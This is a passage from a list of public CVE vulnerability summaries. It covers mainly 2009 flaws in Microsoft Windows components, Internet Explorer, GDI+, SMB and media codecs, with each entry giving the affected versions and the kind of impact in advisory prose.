code via a crafted response, aka "SMB Client Pool Corruption Vulnerability." [CVE-2009-4313] ir32_32.dll 3.24.15.3 in the Indeo32 codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to cause a denial of service (heap corruption) or execute arbitrary code via malformed data in a stream in a media file, as demonstrated by an AVI file. [CVE-2009-4312] Unspecified vulnerability in the Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted media content, as reported to Microsoft by Dave Lenoe of Adobe. [CVE-2009-4311] Unspecified vulnerability in the Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted media content, as reported to Microsoft by Paul Byrne of NGS Software. NOTE: this might overlap CVE-2008-3615. [CVE-2009-4310] Stack-based buffer overflow in the Intel Indeo41 codec for Windows Media Player in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted compressed video data in an IV41 stream in a media file, leading to many loop iterations, as demonstrated by data in an AVI file. [CVE-2009-4309] Heap-based buffer overflow in the Intel Indeo41 codec for Windows Media Player in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via a large size value in a movi record in an IV41 stream in a media file, as demonstrated by an AVI file. [CVE-2009-4210] The Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted media content. [CVE-2009-3678] Integer overflow in cdd.dll in the Canonical Display Driver (CDD) in Microsoft Windows Server 2008 R2 and Windows 7 on 64-bit platforms, when the Windows Aero theme is installed, allows context-dependent attackers to cause a denial of service (reboot) or possibly execute arbitrary code via a crafted image file that triggers incorrect data parsing after user-mode data is copied to kernel mode, as demonstrated using "Browse with Irfanview" and certain actions on a folder containing a large number of thumbnail images in Resample mode, possibly related to the ATI graphics driver or win32k.sys, aka "Canonical Display Driver Integer Overflow Vulnerability." [CVE-2009-3677] The Internet Authentication Service (IAS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold and SP1, and Server 2008 Gold does not properly verify the credentials in an MS-CHAP v2 Protected Extensible Authentication Protocol (PEAP) authentication request, which allows remote attackers to access network resources via a malformed request, aka "MS-CHAP Authentication Bypass Vulnerability." [CVE-2009-3676] The SMB client in the kernel in Microsoft Windows Server 2008 R2 and Windows 7 allows remote SMB servers and man-in-the-middle attackers to cause a denial of service (infinite loop and system hang) via a (1) SMBv1 or (2) SMBv2 response packet that contains (a) an incorrect length value in a NetBIOS header or (b) an additional length field at the end of this response packet, aka "SMB Client Incomplete Response Vulnerability." [CVE-2009-3675] LSASS.exe in the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote authenticated users to cause a denial of service (CPU consumption) via a malformed ISAKMP request over IPsec, aka "Local Security Authority Subsystem Service Resource Exhaustion Vulnerability." [CVE-2009-3294] The popen API function in TSRM/tsrm_win32.c in PHP before 5.2.11 and 5.3.x before 5.3.1, when running on certain Windows operating systems, allows context-dependent attackers to cause a denial of service (crash) via a crafted (1) "e" or (2) "er" string in the second argument (aka mode), possibly related to the _fdopen function in the Microsoft C runtime library. NOTE: this might not cross privilege boundaries except in rare cases in which the mode argument is accessible to an attacker outside of an application that uses the popen function. [CVE-2009-3126] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Integer Overflow Vulnerability." [CVE-2009-3103] Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2009-3020] win32k.sys in Microsoft Windows Server 2003 SP2 allows remote attackers to cause a denial of service (system crash) by referencing a crafted .eot file in the src descriptor of an @font-face Cascading Style Sheets (CSS) rule in an HTML document, possibly related to the Embedded OpenType (EOT) Font Engine, a different vulnerability than CVE-2006-0010, CVE-2009-0231, and CVE-2009-0232. NOTE: some of these details are obtained from third party information. [CVE-2009-3019] Microsoft Internet Explorer 6 on Windows XP SP2 and SP3, and Internet Explorer 7 on Vista, allows remote attackers to cause a denial of service (application crash) via JavaScript code that calls createElement to create an instance of the LI element, and then calls setAttribute to set the value attribute. [CVE-2009-2764] Microsoft Internet Explorer 8.0.7100.0 on Windows 7 RC on the x64 platform allows remote attackers to cause a denial of service (application crash) via a certain DIV element in conjunction with SCRIPT elements that have empty contents and no reference to a valid external script location. [CVE-2009-2655] mshtml.dll in Microsoft Internet Explorer 7 and 8 on Windows XP SP3 allows remote attackers to cause a denial of service (application crash) by calling the JavaScript findText method with a crafted Unicode string in the first argument, and only one additional argument, as demonstrated by a second argument of -1. [CVE-2009-2653] DISPUTED The NtUserConsoleControl function in win32k.sys in Microsoft Windows XP SP2 and SP3, and Server 2003 before SP1, allows local administrators to bypass unspecified "security software" and gain privileges via a crafted call that triggers an overwrite of an arbitrary memory location. NOTE: the vendor disputes the significance of this report, stating that 'the Administrator to SYSTEM "escalation" is not a security boundary we defend.' [CVE-2009-2544] Directory traversal vulnerability in the Marcelo Costa FileServer component 1.0 for Microsoft Windows Live Messenger and Messenger Plus! Live (MPL) allows remote authenticated users to list arbitrary directories and read arbitrary files via a .. (dot dot) in a pathname. [CVE-2009-2532] Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC do not properly process the command value in an SMB Multi-Protocol Negotiate Request packet, which allows remote attackers to execute arbitrary code via a crafted SMBv2 packet to the Server service, aka "SMBv2 Command Value Vulnerability." [CVE-2009-2527] Heap-based buffer overflow in Microsoft Windows Media Player 6.4 allows remote attackers to execute arbitrary code via (1) a crafted ASF file or (2) crafted streaming content, aka "WMP Heap Overflow Vulnerability." [CVE-2009-2526] Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 do not properly validate fields in SMBv2 packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted packet to the Server service, aka "SMBv2 Infinite Loop Vulnerability." [CVE-2009-2525] Microsoft Windows Media Runtime, as used in DirectShow WMA Voice Codec, Windows Media Audio Voice Decoder, and Audio Compression Manager (ACM), does not properly initialize unspecified functions within compressed audio files, which allows remote attackers to execute arbitrary code via (1) a crafted media file or (2) crafted streaming content, aka "Windows Media Runtime Heap Corruption Vulnerability." [CVE-2009-2524] Integer underflow in the NTLM authentication feature in the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to cause a denial of service (reboot) via a malformed packet, aka "Local Security Authority Subsystem Service Integer Overflow Vulnerability." [CVE-2009-2519] The DHTML Editing Component ActiveX control in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly format HTML markup, which allows remote attackers to execute arbitrary code via a crafted web site that triggers "system state" corruption, aka "DHTML Editing Component ActiveX Control Vulnerability." [CVE-2009-2517] The kernel in Microsoft Windows Server 2003 SP2 does not properly handle unspecified exceptions when an error condition occurs, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2009-2516] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold and SP1, and Server 2008 Gold does not properly validate data sent from user mode, which allows local users to gain privileges via a crafted PE .exe file that triggers a NULL pointer dereference during chain traversal, aka "Windows Kernel NULL Pointer Dereference Vulnerability." [CVE-2009-2515] Integer underflow in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows local users to gain privileges via a crafted application that triggers an incorrect truncation of a 64-bit integer to a 32-bit integer, aka "Windows Kernel Integer Underflow Vulnerability." [CVE-2009-2514] win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not correctly parse font code during construction of a directory-entry table, which allows remote attackers to execute arbitrary code via a crafted Embedded OpenType (EOT) font, aka "Win32k EOT Parsing Vulnerability." [CVE-2009-2513] The Graphics Device Interface (GDI) in win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Insufficient Data Validation Vulnerability." [CVE-2009-2511] Integer overflow in the CryptoAPI component in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows man-in-the-middle attackers to spoof arbitrary SSL servers and other entities via an X.509 certificate that has a malformed ASN.1 Object Identifier (OID) and was issued by a legitimate Certification Authority, aka "Integer Overflow in X.509 Object Identifiers Vulnerability." [CVE-2009-2510] The CryptoAPI component in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, as used by Internet Explorer and other applications, does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, aka "Null Truncation in X.509 Common Name Vulnerability," a related issue to CVE-2009-2408. [CVE-2009-2509] Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly validate headers in HTTP requests, which allows remote authenticated users to execute arbitrary code via a crafted request to an IIS web server, aka "Remote Code Execution in ADFS Vulnerability." [CVE-2009-2508] The single sign-on implementation in Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly remove credentials at the end of a network session, which allows physically proximate attackers to obtain the credentials of a previous user of the same web browser by using data from the browser's cache, aka "Single Sign On Spoofing in ADFS Vulnerability." [CVE-2009-2507] A certain ActiveX control in the Indexing Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly process URLs, which allows remote attackers to execute arbitrary programs via unspecified vectors that cause a "vulnerable binary" to load and run, aka "Memory Corruption in Indexing Service Vulnerability." [CVE-2009-2505] The Internet Authentication Service (IAS) in Microsoft Windows Vista SP2 and Server 2008 SP2 does not properly validate MS-CHAP v2 Protected Extensible Authentication Protocol (PEAP) authentication requests, which allows remote attackers to execute arbitrary code via crafted structures in a malformed request, aka "Internet Authentication Service Memory Corruption Vulnerability." [CVE-2009-2504] Multiple integer overflows in unspecified APIs in GDI+ in Microsoft .NET Framework 1.1 SP1, .NET Framework 2.0 SP1 and SP2, Windows XP SP2 and SP3, Windows Server 2003 SP2, Vista Gold and SP1, Server 2008 Gold, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allow remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "GDI+ .NET API Vulnerability." [CVE-2009-2503] GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Windows Server 2003 SP2, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 does not properly allocate an unspecified buffer, which allows remote attackers to execute arbitrary code via a crafted TIFF image file that triggers memory corruption, aka "GDI+ TIFF Memory Corruption Vulnerability." [CVE-2009-2502] Buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted TIFF image file, aka "GDI+ TIFF Buffer Overflow Vulnerability." [CVE-2009-2501] Heap-based buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Heap Overflow Vulnerability." [CVE-2009-2500] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted WMF image file, aka "GDI+ WMF Integer Overflow Vulnerability." [CVE-2009-2499] Microsoft Windows Media Format Runtime 9.0, 9.5, and 11 [CVE-2009-2498] Microsoft Windows Media Format Runtime 9.0, 9.5, and 11 and Windows Media Services 9.1 and 2008 do not properly parse malformed headers in Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted (1) .asf, (2) .wmv, or (3) .wma file, aka "Windows Media Header Parsing Invalid Free Vulnerability." [CVE-2009-2494] The Active Template Library (ATL) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via vectors related to erroneous free operations after reading a variant from a stream and deleting this variant, aka "ATL Object Type Mismatch Vulnerability." [CVE-2009-2484] Stack-based buffer overflow in the Win32AddConnection function in modules/access/smb.c in VideoLAN VLC media player 0.9.9, when running on Microsoft Windows, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long smb URI in a playlist file. [CVE-2009-2357] The default configuration of TekRADIUS 3.0 uses the sa account to communicate with Microsoft SQL Server, which makes it easier for remote attackers to obtain privileged access to the database and the underlying Windows operating system. [CVE-2009-1930] The Telnet service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote Telnet servers to execute arbitrary code on a client machine by replaying the NTLM credentials of a client user, aka "Telnet Credential Reflection Vulnerability," a related issue to CVE-2000-0834. [CVE-2009-1929] Heap-based buffer overflow in the Microsoft Terminal Services Client ActiveX control running RDP 6.1 on Windows XP SP2, Vista SP1 or SP2, or Server 2008 Gold or SP2 [CVE-2009-1928] Stack consumption vulnerability in the LDAP service in Active Directory on Microsoft Windows 2000 SP4, Server 2003 SP2, and Server 2008 Gold and SP2 [CVE-2009-1926] Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to cause a denial of service (TCP outage) via a series of TCP sessions that have pending data and a (1) small or (2) zero receive window size, and remain in the FIN-WAIT-1 or FIN-WAIT-2 state indefinitely, aka "TCP/IP Orphaned Connections Vulnerability." [CVE-2009-1925] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 does not properly manage state information, which allows remote attackers to execute arbitrary code by sending packets to a listening service, and thereby triggering misinterpretation of an unspecified field as a function pointer, aka "TCP/IP Timestamps Code Execution Vulnerability." [CVE-2009-1924] Integer overflow in the Windows Internet Name Service (WINS) component for Microsoft Windows 2000 SP4 allows remote WINS replication partners to execute arbitrary code via crafted data structures in a packet, aka "WINS Integer Overflow Vulnerability." [CVE-2009-1923] Heap-based buffer overflow in the Windows Internet Name Service (WINS) component for Microsoft Windows 2000 SP4 and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted WINS replication packet that triggers an incorrect buffer-length calculation, aka "WINS Heap Overflow Vulnerability." [CVE-2009-1922] The Message Queuing (aka MSMQ) service for Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP2, and Vista Gold does not properly validate unspecified IOCTL request data from user mode before passing this data to kernel mode, which allows local users to gain privileges via a crafted request, aka "MSMQ Null Pointer Vulnerability." [CVE-2009-1920] The JScript scripting engine 5.1, 5.6, 5.7, and 5.8 in JScript.dll in Microsoft Windows, as used in Internet Explorer, does not properly load decoded scripts into memory before execution, which allows remote attackers to execute arbitrary code via a crafted web site that triggers memory corruption, aka "JScript Remote Code Execution Vulnerability." [CVE-2009-1808] Microsoft Windows XP SP3 allows local users to cause a denial of service (system crash) by making an SPI_SETDESKWALLPAPER SystemParametersInfo call with an improperly terminated pvParam argument, followed by an SPI_GETDESKWALLPAPER SystemParametersInfo call. [CVE-2009-1761] The message engine in CA ARCserve Backup r12.0 and r12.0 SP1 for Windows allows remote attackers to cause a denial of service (crash) via (1) an invalid 0x13 message, which is not properly handled in the ASCORE module, or (2) a 0x3B message with invalid stub data that triggers an RPC marshalling error. [CVE-2009-1546] Integer overflow in Avifil32.dll in the Windows Media file handling functionality in Microsoft Windows allows remote attackers to execute arbitrary code on a Windows 2000 SP4 system via a crafted AVI file, or cause a denial of service on a Windows XP SP2 or SP3, Server 2003 SP2, Vista Gold, SP1, or SP2, or Server 2008 Gold or SP2 system via a crafted AVI file, aka "AVI Integer Overflow Vulnerability." [CVE-2009-1545] Unspecified vulnerability in Avifil32.dll in the Windows Media file handling functionality in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a malformed header in a crafted AVI file, aka "Malformed AVI Header Vulnerability." [CVE-2009-1539] The QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 does not properly validate unspecified size fields in QuickTime media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "DirectX Size Validation Vulnerability." [CVE-2009-1538] The QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 performs updates to pointers without properly validating unspecified data values, which allows remote attackers to execute arbitrary code via a crafted QuickTime media file, aka "DirectX Pointer Validation Vulnerability." [CVE-2009-1537] Unspecified vulnerability in the QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted QuickTime media file, as exploited in the wild in May 2009, aka "DirectX NULL Byte Overwrite Vulnerability." [CVE-2009-1533] Buffer overflow in the Works for Windows document converters in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, Office 2007 SP1, and Works 8.5 and 9 allows remote attackers to execute arbitrary code via a crafted Works .wps file that triggers memory corruption, aka "File Converter Buffer Overflow Vulnerability." [CVE-2009-1532] Microsoft Internet Explorer 8 for Windows XP SP2 and SP3 [CVE-2009-1531] Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1530] Use-after-free vulnerability in Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1529] Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1528] Microsoft Internet Explorer 6 and 7 for Windows XP SP2 and SP3 [CVE-2009-1511] GDI+ in Microsoft Windows XP SP3 allows remote attackers to cause a denial of service (infinite loop) via a PNG file that contains a certain large btChunkLen value. [CVE-2009-1335] Microsoft Internet Explorer 7 and 8 on Windows XP and Vista allows remote attackers to cause a denial of service (application hang) via a large document composed of unprintable characters, aka MSRC 9011jr. [CVE-2009-1331] Integer overflow in Microsoft Windows Media Player (WMP) 11.0.5721.5260 allows remote attackers to cause a denial of service (application crash) via a crafted .mid file, as demonstrated by crash.mid. [CVE-2009-1217] Off-by-one error in the GpFont::SetData function in gdiplus.dll in Microsoft GDI+ on Windows XP allows remote attackers to cause a denial of service (stack corruption and application termination) via a crafted EMF file that triggers an integer overflow, as demonstrated by voltage-exploit.emf, aka the "Microsoft GdiPlus EMF GpFont.SetData integer overflow." [CVE-2009-1216] Multiple unspecified vulnerabilities in (1) unlzh.c and (2) unpack.c in the gzip libraries in Microsoft Windows Server 2008, Windows Services for UNIX 3.0 and 3.5, and the Subsystem for UNIX-based Applications (SUA) [CVE-2009-1141] Microsoft Internet Explorer 6 for Windows XP SP2 and SP3 and Server 2003 SP2 allows remote attackers to execute arbitrary code via unspecified DHTML function calls related to a tr element and the "insertion, deletion and attributes of a table cell," which trigger memory corruption when the window is destroyed, aka "DHTML Object Memory Corruption Vulnerability." [CVE-2009-1139] Memory leak in the LDAP service in Active Directory on Microsoft Windows 2000 SP4 and Server 2003 SP2, and Active Directory Application Mode (ADAM) on Windows XP SP2 and SP3 and Server 2003 SP2, allows remote attackers to cause a denial of service (memory consumption and service outage) via (1) LDAP or (2) LDAPS requests with unspecified OID filters, aka "Active Directory Memory Leak Vulnerability." [CVE-2009-1138] The LDAP service in Active Directory on Microsoft Windows 2000 SP4 does not properly free memory for LDAP and LDAPS requests, which allows remote attackers to execute arbitrary code via a request that uses hexadecimal encoding, whose associated memory is not released, related to a "DN AttributeValue," aka "Active Directory Invalid Free Vulnerability." NOTE: this issue is probably a memory leak. [CVE-2009-1133] Heap-based buffer overflow in Microsoft Remote Desktop Connection (formerly Terminal Services Client) running RDP 5.0 through 6.1 on Windows, and Remote Desktop Connection Client for Mac 2.0, allows remote attackers to execute arbitrary code via unspecified parameters, aka "Remote Desktop Connection Heap Overflow Vulnerability." [CVE-2009-1132] Heap-based buffer overflow in the Wireless LAN AutoConfig Service (aka Wlansvc) in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a malformed wireless frame, aka "Wireless Frame Parsing Remote Code Execution Vulnerability." [CVE-2009-1127] win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not correctly validate an argument to an unspecified system call, which allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, aka "Win32k NULL Pointer Dereferencing Vulnerability." [CVE-2009-1126] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly validate the user-mode input associated with the editing of an unspecified desktop parameter, which allows local users to gain privileges via a crafted application, aka "Windows Desktop Parameter Edit Vulnerability." [CVE-2009-1125] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate an argument to an unspecified system call, which allows local users to gain privileges via a crafted application, aka "Windows Driver Class Registration Vulnerability." [CVE-2009-1124] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate user-mode pointers in unspecified error conditions, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Pointer Validation Vulnerability." [CVE-2009-1123] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate changes to unspecified kernel objects, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Desktop Vulnerability." [CVE-2009-1122] The WebDAV extension in Microsoft Internet Information Services (IIS) 5.0 on Windows 2000 SP4 does not properly decode URLs, which allows remote attackers to bypass authentication, and possibly read or create files, via a crafted HTTP request, aka "IIS 5.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1535. [CVE-2009-1043] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors triggered by clicking on a link, as demonstrated by Nils during a PWN2OWN competition at CanSecWest 2009. [CVE-2009-0555] Microsoft Windows Media Runtime, as used in DirectShow WMA Voice Codec, Windows Media Audio Voice Decoder, and Audio Compression Manager (ACM), does not properly process Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted audio file that uses the Windows Media Speech codec, aka "Windows Media Runtime Voice Sample Rate Vulnerability." [CVE-2009-0554] Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0553] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0552] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 on Windows XP SP2 and SP3, and 6 on Windows Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0551] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 does not properly handle transition errors in a request for one HTTP document followed by a request for a second HTTP document, which allows remote attackers to execute arbitrary code via vectors involving (1) multiple crafted pages on a web site or (2) a web page with crafted inline content such as banner advertisements, aka "Page Transition Memory Corruption Vulnerability." [CVE-2009-0550] Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 [CVE-2009-0341] The shell32 module in Microsoft Internet Explorer 7.0 on Windows XP SP3 might allow remote attackers to execute arbitrary code via a long VALUE attribute in an INPUT element, possibly related to a stack consumption vulnerability. [CVE-2009-0320] Microsoft Windows XP, Server 2003 and 2008, and Vista exposes I/O activity measurements of all processes, which allows local users to obtain sensitive information, as demonstrated by reading the I/O Other Bytes column in Task Manager (aka taskmgr.exe) to estimate the number of characters that a different user entered at a runas.exe password prompt, related to a "benchmarking attack." [CVE-2009-0244] Directory traversal vulnerability in the OBEX FTP Service in the Microsoft Bluetooth stack in Windows Mobile 6 Professional, and probably Windows Mobile 5.0 for Pocket PC and 5.0 for Pocket PC Phone Edition, allows remote authenticated users to list arbitrary directories, and create or read arbitrary files, via 